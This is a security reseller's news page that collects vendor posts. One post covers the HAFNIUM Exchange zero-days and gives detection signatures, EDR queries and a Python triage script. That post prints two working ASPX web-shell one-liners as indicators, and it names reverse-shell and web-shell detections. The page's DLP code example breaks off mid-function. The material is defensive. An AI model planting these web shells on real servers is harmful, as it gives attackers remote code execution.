
Cyber Security Elements by NSS

News

16 Mar

There’s no argument that the pandemic has driven a massive increase in remote working. During May 2020, 62% of employed Americans were working from home (WFH), up from just 7% pre-COVID.

However, remote working was already a trend even before COVID, and many in-office employees were already transitioning to working from home a few days a week. In the UK, remote working climbed at a rate of 74% in the last decade, while in Australia, about a third of the workforce was regularly WFH.

At the same time, cyber attackers preyed on those remote workers, using them as back doors, gaining multiple entry points and penetrating organizations quickly.

Securing employees in any location

Remote working is a win-win for companies and staff. Employees save commuting time and costs while enjoying added flexibility and greater productivity. Meanwhile, organizations reduce operational costs and turnover rates.

But for IT teams, long-term remote working creates additional security challenges. Whether employees are logging in from their living rooms, visiting a customer location, or sipping coffee at a Wi-Fi hotspot, your network and data must remain protected at all times.

With Sophos, your users can quickly, efficiently, and securely connect and work from anywhere. We offer both traditional VPN-based and zero-trust network access (ZTNA) options.

Sophos VPN

The vast majority of remote workers right now are connecting to the main office and cloud-based resources (SaaS or Public Cloud) via VPN. At Sophos, we have a long history of enabling secure remote VPN connections with Sophos Firewall. In fact, we have two options:

1. The first is Sophos Connect, a free, easy-to-use VPN client that you run on your devices. Simple to deploy and configure, Sophos Connect gives your remote users secure access to resources on the corporate network or public cloud from Windows and macOS devices. It’s also hugely popular, and we currently have over 1.4 million active clients.

2. There’s also SD-RED, a plug-and-play remote Ethernet device that connects branch offices, remote sites, and individuals to the main network (physical or cloud). It’s the ultimate in small/home office protection, with an always-on dedicated or split-tunnel VPN that’s easy to deploy and manage with various flexible options. It’s also very portable – about the size of an old DVD player – making it ideal for anyone who needs a secure connection at any time and from any location.

Sophos ZTNA: The Future of Secure Connectivity

Many organizations are asking for more than VPN was ever designed to deliver, which is where Sophos Zero Trust Network Access (ZTNA), our new remote access solution, comes in. As the name implies, ZTNA eliminates the concept of implicit trust in an individual based on their presence on the network alone.

Sophos ZTNA is a great alternative to VPN, enabling users to connect to corporate resources from any location in a straightforward and transparent way. At the same time, it elevates protection and minimizes the risk of lateral movement within the network by continually assessing identity and device health before allowing access.

Sophos ZTNA makes sure the device is enrolled, up-to-date, properly protected, and has encryption automatically enabled. It then uses that information to make decisions based on customizable policies to determine user access and privilege to your critical networked applications.

Sophos ZTNA protects any networked application, whether hosted on a company’s on-premises network, in the public cloud, or at any other hosting site. It provides coverage for everything from Remote Desktop Protocol (RDP) access to network file shares to applications like Jira, wikis, source code repositories, support and ticketing apps, and more.

Sophos ZTNA has three major components:

1. The ZTNA client is installed on users’ devices, providing a transparent user experience that integrates device health and user identity. It’s easy to deploy alongside our Intercept X endpoint, effectively running as a single agent for customers using both of our products, but it can also work with any endpoint solution. It supports Windows initially, with Mac and mobile device support to follow.

2. Sophos Central is your cloud management platform for all things Sophos, including Sophos ZTNA. Use Sophos Central for deployment, to set granular policy controls over who can access what apps under what conditions, and for insightful reporting.

3. The ZTNA Gateway is delivered as software and as a VM, for deployment in the public cloud or in on-premises virtual environments. It continuously verifies and validates user identity and device health to provide secure access to apps and data based on policy, and shares log and event data back to Sophos Central. Users can also log into the ZTNA Gateway to easily see and launch all the apps they are authorized to access.

For more information on Sophos ZTNA and to join the early access program visit www.sophos.com/ztna.

Source: Sophos

13 Mar

Sophos customers are protected from the exploitation of the new zero-day vulnerabilities affecting Microsoft Exchange.

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network, and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVE              SID
CVE-2021-26855   57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857   57233, 57234
CVE-2021-26858   57245, 57246
CVE-2021-27065   57245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVE              SID
CVE-2021-26855   57241, 57242, 57243, 57244
CVE-2021-26857   57233, 57234
CVE-2021-26858   57245, 57246
CVE-2021-27065   57245, 57246

If you see these detection names on your networks, you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O (alert in progress)
  • Troj/WebShel-P (alert in progress)

Other payloads

  • Mal/Chopper-A
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks, you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

/* Query for known web shell names.
   Each LIKE pattern names one directory; the trailing \% returns the files
   directly inside it. */
SELECT
  datetime(btime, 'unixepoch') AS created_time,
  filename,
  directory,
  size AS fileSize,
  datetime(atime, 'unixepoch') AS access_time,
  datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
  (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%'
   OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%'
   OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
  AND filename IN ('web.aspx', 'help.aspx', 'document.aspx', 'errorEE.aspx', 'errorEEE.aspx',
                   'errorEW.aspx', 'errorFF.aspx', 'healthcheck.aspx', 'aspnet_www.aspx',
                   'aspnet_client.aspx', 'xx.aspx', 'shell.aspx', 'aspnet_iisstart.aspx',
                   'one.aspx', 'errorcheck.aspx', 't.aspx', 'discover.aspx', 'aspnettest.aspx',
                   'error.aspx', 'RedirSuiteServerProxy.aspx', 'shellex.aspx', 'supp0rt.aspx',
                   'HttpProxy.aspx', 'system_web.aspx', 'OutlookEN.aspx', 'TimeoutLogout.aspx',
                   'Logout.aspx', 'OutlookJP.aspx', 'MultiUp.aspx', 'OutlookRU.aspx');

/* Query for web shells with randomized 8-character names.
   The pattern is anchored and the dot escaped, so only filenames made of
   exactly eight alphanumerics followed by .aspx are returned; the regex
   match is applied in WHERE so that non-matching files are filtered out. */
SELECT
  datetime(btime, 'unixepoch') AS created_time,
  filename,
  directory,
  size AS fileSize,
  datetime(atime, 'unixepoch') AS access_time,
  datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
  (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%'
   OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%'
   OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
  AND regex_match(filename, '^[0-9a-zA-Z]{8}\.aspx$', 0) = filename;

When reviewing the potential web shells identified by the queries, note that the web shell typically appears inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. For example:

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>

ExternalUrl : http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
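The same triage can be scripted offline against exported file listings and OAB virtual directory output. This is an added example, not Sophos code: the watched directories and filename list come from the EDR queries above, the file paths and the OAB dump are constructed sample input, and the function names are our own.

```python
"""Triage helpers for the HAFNIUM web-shell indicators listed on this page.

Added example (not Sophos code). The directory and filename lists are taken
from the EDR queries above; the sample paths and OAB dump are constructed.
"""
import re

# Web-root locations checked by the EDR queries (compared case-insensitively,
# as Windows paths are).
WATCHED_DIRS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\inetpub\wwwroot\aspnet_client\system_web",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
]

# Known web-shell filenames from the first query, lower-cased and deduplicated.
KNOWN_SHELL_NAMES = {n.lower() for n in [
    "web.aspx", "help.aspx", "document.aspx", "errorEE.aspx", "errorEEE.aspx",
    "errorEW.aspx", "errorFF.aspx", "healthcheck.aspx", "aspnet_www.aspx",
    "aspnet_client.aspx", "xx.aspx", "shell.aspx", "aspnet_iisstart.aspx",
    "one.aspx", "errorcheck.aspx", "t.aspx", "discover.aspx", "aspnettest.aspx",
    "error.aspx", "RedirSuiteServerProxy.aspx", "shellex.aspx", "supp0rt.aspx",
    "HttpProxy.aspx", "system_web.aspx", "OutlookEN.aspx", "TimeoutLogout.aspx",
    "Logout.aspx", "OutlookJP.aspx", "MultiUp.aspx", "OutlookRU.aspx",
]}

# Second query: randomized 8-character names. Anchored and with the dot
# escaped so that a 10-character name such as aB3dE9fGhh.aspx is not matched.
RANDOM_NAME_RE = re.compile(r"^[0-9a-z]{8}\.aspx$", re.IGNORECASE)

# A server-side script block embedded in an OAB ExternalUrl. Smart quotes are
# accepted because configuration output pasted from documents often has them.
SCRIPT_RE = re.compile(r"<script\b[^>]*\brunat\s*=\s*[\"'\u201c\u201d]?server",
                       re.IGNORECASE)


def classify_path(path: str):
    """Return why `path` matches the web-shell indicators, or None if it does not."""
    full = path.replace("/", "\\").lower()
    # Require the directory separator so "aspnet_client_backup" does not match.
    if not any(full.startswith(d.lower() + "\\") for d in WATCHED_DIRS):
        return None
    name = full.rsplit("\\", 1)[-1]
    if name in KNOWN_SHELL_NAMES:
        return "known web shell filename"
    if RANDOM_NAME_RE.match(name):
        return "randomized 8-character .aspx filename"
    return None


def triage_paths(paths):
    """Return (path, reason) for every path that needs investigation."""
    return [(p, r) for p in paths if (r := classify_path(p)) is not None]


def find_script_external_urls(oab_dump: str):
    """Return ExternalUrl values from 'Key : Value' formatted output that embed a
    server-side <script> block. A clean ExternalUrl is a plain URL to /OAB."""
    hits = []
    for line in oab_dump.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "externalurl" and SCRIPT_RE.search(value):
            hits.append(value.strip())
    return hits


# Constructed sample input: one file per case the queries distinguish.
SAMPLE_FILE_PATHS = [
    r"C:\inetpub\wwwroot\aspnet_client\system_web\web.aspx",   # known name
    r"C:\inetpub\wwwroot\aspnet_client\aB3dE9fG.aspx",         # random 8 chars
    r"C:\inetpub\wwwroot\aspnet_client\aB3dE9fGhh.aspx",       # 10 chars: clean
    r"C:\inetpub\wwwroot\aspnet_client\web.config",            # expected file
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx",
    r"C:\Users\alice\Documents\help.aspx",                     # outside web root
]

# Constructed OAB virtual directory output: one clean entry and one carrying
# the script block shape shown on the page (body replaced by a comment).
SAMPLE_OAB_DUMP = """\
Name        : OAB (Default Web Site)
InternalUrl : https://mail.example.internal/OAB
ExternalUrl : https://mail.example.com/OAB

Name        : OAB (Default Web Site)
InternalUrl : https://mail.example.internal/OAB
ExternalUrl : http://f/<script language="JScript" runat="server">/* payload omitted */</script>
"""

if __name__ == "__main__":
    for path, reason in triage_paths(SAMPLE_FILE_PATHS):
        print(f"{reason}: {path}")
    for url in find_script_external_urls(SAMPLE_OAB_DUMP):
        print(f"script block in ExternalUrl: {url}")
```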

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the HAFNIUM group in their attacks. Sophos Intercept X detects and blocks DearCry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Source: Sophos

10 Mar

Datto & Sophos MSP Innovation Day Webinar

During our MSP Innovation Day event we:

  • Discovered how Datto and Sophos integrated solutions can help us improve productivity and automation, and ensure security across all levels.

  • Learned valuable information on how to protect our business’s and our clients’ assets.

  • Gained insight on ways to grow our trade by becoming more skilled at operations and at acquiring industry knowledge, achieving an advantage in today’s competitive markets.

Datto is the leading global provider of IT solutions delivered through managed service providers (MSPs). Datto is more than just a technology provider. It helps you implement and sell solutions that help you grow.

Datto Autotask PSA allows MSPs to run all aspects of their business at peak efficiency. It combines all the mission-critical tools necessary to run a managed services business. Autotask PSA centralizes operations and enables you to make quick data-driven decisions with customizable dashboards and widgets, and provides a real-time view of what’s happening from every angle.

  • Maximize Uptime With a Secure, Cloud Platform

  • Centralize Operations to Increase Efficiency

  • Enable Data-Driven Decisions

  • PSA Software Tailored to You

Sophos is a leader in next-generation endpoint and network security. As the pioneer of synchronized security, Sophos develops its innovative portfolio of endpoint, network, encryption, web, email, and mobile security solutions to work better together.

All products that are deployed as part of the MSP Connect Flex program through Sophos Central will be included in the Datto Autotask PSA integration, including Intercept X, Disk Encryption, Endpoint, Mobile, Web, Email, Wireless, and Cloud Optix.

  • Sophos Central will automatically create all products in Autotask PSA

  • Sophos will automatically update the service contract nightly to provide up-to-date billing information on all Sophos products deployed across an MSP’s customer base

  • The integration will provide ongoing, real-time data to Autotask PSA

  • The integration additionally supports manual syncs to Autotask PSA

Agenda

11:00 OPENING & WELCOMING
George Kouimintzis, Commercial Director, NSS

11:10 DATTO COMPANY PRESENTATION
Joao Caires, Sales Director, Datto RoE

11:20 DATTO RMM – REMOTE MONITORING & MANAGEMENT
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:35 DATTO PSA – PROFESSIONAL SERVICES AUTOMATION
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:50 SOPHOS MSP PROGRAM
Andreas Buttler, Channel Account Manager, MSP, Sophos

12:05 SOPHOS CENTRAL CLOUD BASED SECURITY
Grzegorz Nocon, System Engineer, Sophos

12:15 BUSINESS BENEFITS OF DATTO & SOPHOS INTEGRATION WITH DEMO
George Kouimintzis, Commercial Director, NSS

12:30 CDMA SUCCESS STORY OF DATTO & SOPHOS INTEGRATION
Michael Nicolaou, Senior Network & Security Consultant, CDMA

12:45 NSS, A ONE-STOP-SHOP DISTI FOR MSPS
George F. Kapaniris, Executive Director, NSS

13:00 A REWARDING GAME OF KNOWLEDGE
Panos Kazanelis, Digital Marketing Manager, NSS

13:10 Q&A

Feel free to contact us for any additional information.


8 Mar

With the immense popularity of open-source software such as Linux, WordPress, or Magento, you might wonder why the situation is so different in the world of web application security. Let’s try to compare open-source vulnerability scanners with commercial solutions and it will soon be clear why businesses shy away from open-source web application security tools.

Open-Source and IT Security

A lot of popular IT security software is distributed using open-source licenses. Most penetration testing tools such as nmap or Wireshark are open-source. There are also advanced solutions such as the Snort IPS/IDS and the OpenVAS network vulnerability scanner (an offshoot of Nessus). So why is it different in the case of web application security?

The quality of open-source web application security tools lags behind commercial products. While there are small businesses that say that open-source tools are enough for them, even they tend to change their mind when they grow.

Here are some of the reasons why open-source web application security tools cannot measure up to professional solutions such as Acunetix.

Reason 1. Ease of Use

When the first web security scanners appeared, they were meant to be used manually to perform vulnerability tests. They were intended for security experts – penetration testers, security researchers, etc. Therefore, ease of use was never a very important factor because experts understand web application security well enough to figure out how to get the most out of the software. This trend still prevails with manual tools.

In time, the intended audience for web vulnerability scanners shifted. People without deep security knowledge also needed them, for example, system administrators tasked with handling security in smaller businesses, DevOps administrators setting up agile SDLCs, or even developers themselves. Why not just security personnel? For one simple reason – security needs are growing so fast that there aren’t enough security professionals to hire. There’s a major cybersecurity skills gap, which is expected only to worsen with time. Therefore, more and more security tasks have to go to people who have less training and who rely on good automated tools.

Unfortunately, the development of open-source tools did not follow this trend. Open-source web vulnerability scanners remained rather difficult to use, similar to many other open-source tools.

Reason 2. More than Vulnerability Scanning

Open-source web application security tools are, by design, just vulnerability scanners. However, businesses need much more than pointing a tool at a web server and getting a list of vulnerabilities. You cannot fix all vulnerabilities at once – a business must know which vulnerabilities should be given priority because they pose a bigger security risk. You also need to manage the process of fixing and rechecking.

Professional web application security tools such as Acunetix are not just scanners – they are also vulnerability management and vulnerability assessment tools. They assess vulnerability severity so that you start by fixing important issues like SQL injections or cross-site scripting and only then spend time on non-critical misconfigurations. They also provide both built-in issue management and out-of-the-box integrations with popular issue trackers such as Jira.

Reason 3. Keeping Up with Growth

The third reason why open-source web application security tools are not a good fit for businesses is related to the rapid development of web application security. A business cannot afford to wait until open-source project teams find some time to add new vulnerability classes, new functionalities, or support for new web frameworks. The importance of web application security grows fast – simply because more and more businesses move from on-premises solutions to virtual environments (the cloud). This also means that criminals are very interested in keeping up with the latest developments and finding new ways to take advantage of vulnerabilities.

Software vendors that are fully focused on web application security, such as Invicti, have a unique advantage: they can fully focus on keeping up with web technologies and trends. This is not only an advantage over open-source tools but also over other commercial providers. Many web security tool vendors focus primarily on network security scanners, which are all about signatures and patching, and shy away from the complexities of modern web application security. They simply cannot keep up. Acunetix can.

Reason 4. Hidden Costs of Open-Source

Many businesses that work with open-source tools know very well that there are certain hidden costs associated with free software. In software, free means no help and no support, except for community support. For example, businesses that choose the Linux operating system to replace Windows often subscribe to third-party support programs. This makes free software no longer free and, in the long run, often more expensive than commercial alternatives.

Of course, the need for support is different for different software classes. A simple word processor might not need as much support as a complex IT security solution. Due to their nature, web vulnerability scanners may need some support with initial configuration issues and even more support if you intend to automate tasks and integrate the tools with your current environments.

Without support, open-source web vulnerability tools are just manual pen testing tools for security researchers – they help identify security threats and that’s where the story ends.

Reason 5. False Positives in a Vulnerability Scanner

False positives are the biggest pain point of web application security. This is because web application security mostly deals with custom code. If you have a false positive identified by a network vulnerability test, this does not affect your developers and usually just means that the patches you apply to software or network devices are not critical. In a web application security scenario, you can either double-check every vulnerability found using a scanner and consume the resources of the pen testing team or you can risk that the developers will be hunting ghosts, trying to fix a problem that does not exist.

That is why one of the most important criteria for selecting a web security scanner is how it handles false positives. If the scanner can, in some way, prove that the vulnerability exists, it means that the issue can go straight to the developer for a fix – there’s no need for manual confirmation. Open-source scanners (and several commercial products, too) don’t have such capabilities. Every reported issue is just a potential vulnerability, not a real one. On the other hand, Acunetix can mark the vulnerability as 100% confirmed and in many cases provide you with proof such as a copy of sensitive data that should not be accessible.

Worse still, the problem of false positives does not just grow linearly with the number of web applications and the development of your business. The bigger your business and the more applications you have, the worse the impact of false positives on your resources. So if you’re looking towards the future, you simply cannot afford to use a tool that will hinder your growth, such as a basic, manual, open-source web security scanner.

Can You Afford Free?

Open-source software is a great starting point if you are a learner, an independent researcher, or a small start-up (for example, if you have fewer than 5 web applications in total). However, if you intend to grow, sooner or later you will notice that open-source software is no longer enough: even if it identifies web security vulnerabilities, it cannot help you fix them. And, ultimately, the goal of web application security is not to point out vulnerabilities but to eliminate them.

Source: Acunetix

5 Mar

This course is designed for technical professionals who will be administering Sophos SG UTM and provides the skills necessary to manage common day-to-day tasks. The course is available either online or as an instructor-led classroom course. It consists of presentations and practical lab exercises to reinforce the taught content, and electronic copies of the supporting documents for the course will be provided to each trainee through the online portal.

Sophos UTM Administrator Course (Tuesday 6 April 2021 to Wednesday 7 April 2021)

Objectives

On completion of this course, trainees will be able to:

  • Recognize the main technical capabilities and how they protect against threats
  • Complete common configuration tasks
  • Backup and restore the system
  • Complete common day-to-day tasks
  • View and manage logs and reports

Prerequisites

There are no prerequisites for this course; however, it is recommended that trainees:

  • Have networking knowledge equivalent to CompTIA N+ or better
  • Be familiar with security best practices
  • Be able to set up a Windows server
  • Have experience of configuring and managing network gateway devices
  • Have knowledge of general Windows networking and Microsoft Active Directory

If you are uncertain whether you meet the necessary prerequisites to take this course, please email us at globaltraining@sophos.com and we will be happy to help.

Certification

To become a Sophos Certified Administrator, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and the practical content. The pass mark is 80%, and trainees are limited to 4 attempts.

Location: NSS training center (broadcast via Webex)

Duration: 1 1/2 days 

Lab Environment

Each student will be provided with a pre-configured environment that simulates a company network with two sites (a head office and a branch office) containing Windows servers and two SG UTMs.

Agenda

Trainer: Michael Eleftheroglou

Day 1 Tuesday 6 April 2021 

9:30-10:00 Module 1: Security Threats and how the UTM Protects Against Them 

10:00-11:00 Module 2: Getting Started with UTM Firewall

11:00-12:00 Labs

  • Configure a UTM using the Setup Wizard
  • Navigate the WebAdmin
  • Configure system settings
  • Create definitions
  • Configure interfaces and routing

12:00-12:45 Lunch

12:45-13:10 Module 3: Network Protection

13:10-14:00 Labs

  • Create firewall rules
  • Configure NAT
  • Demonstrate Advanced Threat Protection
  • Configure Intrusion Prevention (IPS)

14:00-14:35 Module 4: Site-to-Site Connections

14:35-15:00 Labs

  • Configure an SSL site-to-site VPN
  • Configure an IPsec site-to-site VPN

15:00-15:35 Module 5: Authentication  

15:35-16:15 Labs

  • Configure local authentication and the User Portal
  • Configure external authentication using Active Directory
  • Enable one-time passwords
  • Configure Active Directory SSO for web filtering

16:15-17:00 Module 6: Web Protection and Application Control

Day 2  Wednesday 7 April 2021 

9:30-11:00 Labs 

  • Deploy the HTTPS CA certificate
  • Configure Filter Actions
  • Manage Websites
  • Configure Web Policies
  • Configure Web Profiles
  • Configure Application Control

11:00-11:35 Module 7: Email Protection

11:35-13:00 Labs

  • Enable and configure quarantine digests
  • Configure an Email Protection Policy for MTA mode
  • Encrypt emails that match a Data Control List using SPX
  • Manage quarantined items as a user

13:00-13:45 Lunch

13:45-14:15 Module 8: Wireless and Remote Access

14:15-14:40 Labs

  • Configure an SSL remote access VPN
  • Configure the HTML5 VPN Portal

14:40-15:10 Module 9: Endpoint Protection and Mobile Control

15:10-15:40 Module 10: Logging, Reporting and Troubleshooting

15:40-16:10 Labs

  • Run, customize and schedule reports
  • View and manage log files
  • Use built-in support tools
  • Further

4 Mar

We’re pleased to announce that Sophos will provide Intercept X endpoint protection for 5G PCs powered by Qualcomm® Snapdragon™ compute platforms from Qualcomm Technologies, Inc. Together they will provide users next-generation security through an always on, always connected PC environment.

Snapdragon compute platforms enabling 5G connectivity build on smartphone technology to deliver premium performance and efficiency to 4G and 5G cellular-connected thin and light fanless laptops.

Sophos Intercept X is designed to protect advanced computing systems and endpoints, stopping the latest cybersecurity threats with deep learning AI and anti-ransomware capabilities. Sophos expects Intercept X for Snapdragon compute platforms to be available in the second half of 2021.

“Snapdragon compute platforms mark a major step forward because they provide all the utility and performance of a PC, but with many of the benefits associated with modern mobile computing devices. Security loves predictability, and Sophos is excited to be a part of securing this next-generation computing platform,” said Joe Levy, chief technology officer, Sophos.

Sophos Intercept X will also:

  • Leverage Connected Standby for continuous communication with a fleet of Snapdragon powered PCs, so that security investigations have fewer unknowns as data won’t be missed due to devices being offline
  • Use AI acceleration through the Qualcomm® AI Engine to run increasingly AI-dependent software in real time on the device, with optimizations that make it faster and more power-efficient, which matters when devices are running on battery
  • Harness the hardware-level root of trust to ascertain device and cryptographic integrity in order to create strong identity bindings

“By working with Sophos, we are taking on-device security to a new level by enhancing their industry-leading endpoint protection with AI accelerated threat detection on our solutions. We’re excited for Sophos to transform computing with next-generation enterprise-grade security on 5G powered Snapdragon compute platforms,” said Miguel Nunes, senior director, Product Management, Qualcomm Technologies, Inc.

Learn more about Sophos Intercept X Endpoint and start a no-obligation 30-day trial today. To learn more about Qualcomm Technologies’ suite of Snapdragon compute platforms, click here.

Source: Sophos

2 Mar

We are pleased to announce that powerful new Extended Detection and Response (XDR) and Endpoint Detection and Response (EDR) features for Intercept X are now available in early access.

The early-access program (EAP) gives you the power to pull in network data sources in addition to those from endpoints and servers, enabling an even more holistic view of your organization’s cybersecurity environment. It also brings the ability to get critical information from your devices even when they are offline.

Sophos Data Lake

The Sophos Data Lake is a key component of both EDR and XDR functionality. It stores critical information from Intercept X, Intercept X for Server, and XG Firewall in the cloud, enabling both cross-product investigations and the retrieval of key information from devices even when they are offline.

For example: look back 30 days for unusual activity on a device that has been destroyed or taken without authorization. Join the EAP to start using it.

Sophos XDR – Extended Detection and Response

Sophos XDR goes beyond the endpoint and server by integrating important network data, building up an in-depth picture of potential threats across your organization’s estate. If you’re already using Intercept X and XG Firewall you just need to join the EAP and you’ll get access to rich cross-product data in one convenient location.

Don’t worry if you don’t have both: you can start a free trial and then join the EAP as normal.

Note: Intercept X and XG Firewall are required to enable the network cross-product functionality. Trying out the cloud storage and offline device capabilities of the Sophos Data Lake just requires joining the EAP; XG Firewall is not required.

Here are just a few Sophos XDR use cases:

  • Compare indicators of compromise from multiple data sources to quickly understand a suspected attack
  • Use ATP and IPS detections from XG Firewall to investigate suspect hosts
  • Identify unmanaged and unprotected devices across an organization’s estate
  • Understand why the office network connection is slow and which app is causing the traffic

How to join the early access program

The EAP is open to everyone that has Intercept X and Intercept X for Server; you don’t need to have EDR. Please note: MSP Flex customers are not eligible to join.

For full instructions on joining and getting started, please head over to the Sophos community forums. We’d love to hear what you think!

Source: Sophos

28 Feb

The amount, complexity, and relevance of the data that companies handle have increased exponentially. Today the data stored by organizations can include buying and selling transactions, market analysis, ideas for future technological innovations, customer or employee information (salaries, health information) and more.

As a consequence, confidential information has become one of an organization’s most valuable assets and, today more than ever, it must be protected throughout its life cycle without slowing the pace of the business.

In 2020, with the rise of remote work caused by the COVID-19 quarantine, many companies were more exposed to security incidents, and the number of hacks has continued to rise. With the new year just beginning, it is a good time to consider what you can do to ensure your data is protected and your business does not become the victim of a data breach.

Here are 10 tips to keep in mind to protect your company information in 2021:

1. Replace FTP Scripts

Many companies still exchange information with clients, partners, or other offices using scripts or custom-developed programs. This is not recommended, as these outdated methods are a threat to your organization’s security.

In terms of security, the first point to note is that the FTP scripts used to send information are usually highly vulnerable by design: plain FTP transmits both the credentials and the file contents in cleartext, and the scripts typically embed the password. In addition, they offer little control over the data, traceability is lost, and they are not accepted by the main compliance regulations (PCI DSS, SOX, and others).

We recommend that you stop using scripts and implement a Secure FTP solution that works with secure protocols, guarantees the confidentiality of the information, is centrally managed, gives you full control and traceability of data movements for audits and regulatory compliance, automates processes, and more.

2. Encrypt Data in Transit and at Rest

Encryption helps information that is stored and shared keep its confidentiality (only those who need it can read it) and, when an authenticated encryption mode is used, its integrity (any alteration of the encrypted data is detected rather than silently accepted). Furthermore, by encrypting your data you ensure that, even in the event of improper access, the information will not be readable. This is why encryption is essential to protect your data against cybersecurity threats, all the more so because it is required by the regulations or standards specific to each industry.

Although there are many encryption software packages, including free ones such as Open PGP Studio, you need to know the different options and choose the right one for your specific case. File transfer software can encrypt data in transit, and digital rights management solutions can control and revoke document access no matter where the data is located.

Do you need personalized advice on encryption and data security? You can contact an expert to help you analyze your specific case.

3. Use Secure Collaboration Tools Between Employees, Customers, and Partners

On a daily basis, it’s often necessary to share information with business partners and between employees located in remote locations; this situation has additionally increased with the rise of remote work caused by the pandemic.

To protect information, it is key that your company uses secure collaboration tools that are agile to use and allow you to perform key tasks for daily operations.

4. Avoid Common Mistakes When Sending Large Files

Many organizations share large files that are critical to the business and only realize they have a problem when transfers get stuck or are “undeliverable”. Or, worse, employees keep using unsafe (generally free) methods and keep putting off the inevitable.

This is a serious error, because in those cases the information can easily be compromised: it usually travels unencrypted, secure protocols are not used, and the organization loses traceability of the data. In addition, if the file does not reach its destination because of its size, users do not usually receive a notification. And if they do, they must rerun the process manually, which costs a notable amount of time.

5. Identify Compromised Devices on the Internal Network

Hackers are becoming increasingly dangerous and the advance of technology seems to work in their favor. Nowadays any device with an Internet connection can be hacked, from a small personal smartphone to an MRI machine in a hospital. From that first foothold, attackers can breach your security infrastructure and access the corporate network to steal your information. Unfortunately, in 2021 we have seen cyberattacks of this type increase, with several multinational companies becoming victims of hacking.

It is essential for your company to identify compromised devices in the internal network with certainty, but that alone is not enough. To properly protect your data, we recommend an advanced threat detection solution based on network traffic inspection.

6. Inspect Your Data Content Using DLP Technology

Even if your company prioritizes access control and user permissions and encrypts the channels used to send information, you may still be exposed to sensitive information (such as credit card data or personal data) or files containing ransomware being sent or received. To avoid these situations, use Data Loss Prevention (DLP) technology, which inspects the content of the information sent or received by your company in order to intercept any data or active code that should not be transmitted.
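A content-inspection check of the kind this tip describes, as an added example that is not Boldon James code: it finds payment card numbers in an outbound message, uses the Luhn checksum so that look-alike numbers such as order references are not flagged, and then either blocks the message or masks the card numbers before it leaves. The sample message, the candidate pattern and the block/mask policy are assumptions for the demo.

```python
"""Added example (not Boldon James code): a minimal content-inspection check of
the kind a DLP engine applies to outbound messages and files.

It looks for primary account numbers (PANs), validates each candidate with the
Luhn checksum so that order numbers and other 13-19 digit strings are not
flagged, and either blocks the message or masks the card numbers before it
leaves. The sample message below is constructed for the demo.
"""
import re

# 13-19 digits, optionally separated by single spaces or dashes, and not
# embedded in a longer run of digits.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits):
    """Luhn checksum: double every second digit from the right, then sum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text):
    """Return (start, end, digits) for every Luhn-valid candidate in text."""
    hits = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_valid(digits):
            hits.append((m.start(), m.end(), digits))
    return hits


def mask_pan(digits):
    """PCI-style masking: keep only the last four digits."""
    return "*" * (len(digits) - 4) + digits[-4:]


def inspect_message(text, action="block"):
    """Policy decision for one message.

    action="block" rejects a message containing card data outright;
    action="mask" lets it through with the PANs masked."""
    hits = find_pans(text)
    if not hits:
        return {"action": "allow", "findings": 0, "text": text}
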